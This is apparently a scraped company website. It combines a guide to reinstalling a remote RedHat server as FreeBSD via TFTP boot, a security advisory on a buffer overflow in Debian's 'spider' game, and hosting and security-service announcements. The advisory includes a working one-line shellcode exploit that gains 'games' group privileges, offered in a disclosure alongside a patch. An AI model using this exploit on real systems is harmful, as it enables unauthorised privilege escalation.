Prerequisites

- the installed OS must have a bootloader that can boot from a tftp server
- your OS of choice must have the ability to boot with a memory resident file system
- you must have access to a tftp server
- you must have access to a system with your OS of choice installed

RedHat to FreeBSD

The following steps are for a FreeBSD install over RedHat
but can be easily adjusted for most of the combinations
- 192.168.0.3 is the ip of the RedHat server
- 192.168.0.1 is the ip of a tftp server (which is the gateway for the RedHat
server in the same time), the tftp server and the RedHat server don’t have
to be on the same network

1. Configuring the bootloader
In this example we’re going to use grub as it supports
a wide variety of OS’s
- download the latest version of grub (currently 0.93)
- download this patch to allow grub to alternatively boot two OS’s
without external intervention (patch details)
- apply the patch in the grub-0.93/stage2 directory
- install grub with support for your network card
- configure grub to boot your current OS

- reboot
- edit grub’s config again and add the entry for tftp boot

- reboot again
- At this point your next reboot will boot using the TFTP BOOT entry,
and in case of failure you will need an external reboot to boot it back
using the installed OS

2. Compiling your kernel
On a FreeBSD system compile a kernel with minimal options
Be sure to include support for your network card
Include the following options:
options MFS
options MD_ROOT
options MD_ROOT_SIZE=34000 (this must be bigger or equal with the size of
your root image)
built your kernel:

For more information about building custom kernels on freebsd
Please see the handbook and the related man pages
http://www.FreeBSD.org

3. Create the root image
- creating the new file system

- install a minimal freebsd distribution in /mnt/rootfs
For tips & tricks : http://neon1.net/misc/minibsd.html
- Be sure to include sshd
- Configure the network with the details of the server where
this is going to be used
- Add yourself an account to be able to login with ssh and su to root

4. Insert the root image into kernel
For this you can use the write_mfs_in_kernel program which comes with freebsd.
You can find it at /usr/src/release/write_mfs_in_kernel.c

Copy kernel.gz to your tftp server

5. Booting minibsd
- Reboot the RedHat server which will boot the kernel from the tftp server
If everything went ok you should be able to ssh to the old redhat server
running now your minibsd.
Once logged in you can format the harddisk and install freebsd
using your preferred method.

Enjoy.
Emilian M. Ursu
emu@emuadmin.com

Summary:
A vulnerability has been discovered in the game spider, an application contained in the Debian GNU/Linux distribution.
The vulnerability allows a local attacker to gain elevated privileges by overflowing the -s parameter.

Impact:
The attacker can gain group privileges. By default “games”.

Workaround:
A patch can be found at http://www.emuadmin.com/contrib/software/spider/spider-1.1.patch

Details:
The vulnerability is located in the file movelog.c

sh# spider -s `perl -e ‘print “A” x 1045′`
Program received signal SIGSEGV, Segmentation fault.
Quick exploit:
sh# spider -s `perl -e ‘print “\x90″ x 987 . “\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80″. “\x0c\xf6\xf\xbf”‘`
sh# id
uid=1002(gigi) gid=13(games) groups=100(users)

Availability
This message and any further updates can be found at http://www.emuadmin.com/advisories/spider-1.1-10032004

Security Team
security@emuadmin.com

After several weeks of preparations, we are proud to anounce our latest website: GeekHosters. As the name and the slogan (“Hosting the Future.”) suggest, it is about our web hosting service. GeekHosters aims to serve especially end users, but resellers too.

Our goal is to provide competitive hosting solutions with affordable pricing. We achieve this goal by complying to a high quality standard, which, in short, is defined by:

So, customers do not have to worry if their scripts will run or not or if their website can be put down by an Internet attack. Moreover, we give special credit to customers suggestions, and so GeekHosters is better every day.

As about our infrastructure, our secure datacenters are located in USA, running high quality software meant to keep both a high performance level and a secure environment. Also our network is a 24/7 managed environment.

Our offer is not tailored for a particular class of customer. GeekHosters offers general purpose, industry standard web hosting featured with all common and popular software, so any webmaster will not face any incompatibility issue.

After months of research we found Zope to be the product we were looking for. Zope is an open source web application server primarily written in the Python programming language. It features a transactional object database which can store not only content and custom data, but also dynamic HTML templates, scripts, a search engine, and relational database (RDBMS) connections and code. It features a strong through-the-web development model, allowing you to update your web site from anywhere in the world.
We want to use this occasion to thank the Zope team for this great product.

After over one year of serving you, we are glad to announce our first form of Emuadmin’s presence on the web. Along the time many of you asked why we don’t have a website and my answer has always been the same. My belief has always been that not the look of a website makes the quality of a service. I prefered offering a quality service to putting time in a website The question that you’re all going to ask now is “So why a website now ?” Well, along with the growth of our company it become more and more hard to get in touch with each one of you, and I feel that this presence its more and more of a need.
Thank you for your time in reading this and I hope we’ll get the privilege to serve your business.

Emuadmin develops and offers custom security patches which will minimize the risks of a potential attack upon your Internet hosts. We support all UNIX-like software, from Web servers to DNS, SSH, FTP etc. servers.

In the area of security patching, Emuadmin offers:

• 24/7 live support
• periodical updates
• performance optimization
• custom plug-ins
• troubleshooting

Emuadmin is specialized in IDS, always able and willing to secure your server either by using a popular product, either by developing a custom IDS, tailored for your business needs.

In the area of IDS, Emuadmin offers:

* 24/7 live support
* periodical updates
* performance optimization
* custom plug-ins
* troubleshooting

Firewalls will work exactly as intended, blocking incoming our outgoing traffic that you do not desire on particular Net services (ssh, ftp, web, dns etc.) or for specific Internet hosts that can cause damage or are traffic consumers.

Emuadmin supports all UNIX-like platforms, such as Linux, FreeBSD, OpenBSD, NetBSD, Solaris etc.

In the area of custom firewalls, Emuadmin offers:

• 24/7 live support
• periodical updates
• performance optimization
• custom plug-ins
• troubleshooting

We offer full security auditing services for all UNIX-like operating systems (such as Linux, FreeBSD, Solaris etc.) and for all Internet services.

In the area of security auditing, Emuadmin offers:

• 24/7 live support
• threat identification and termination
• periodical check
• performance optimization
• troubleshooting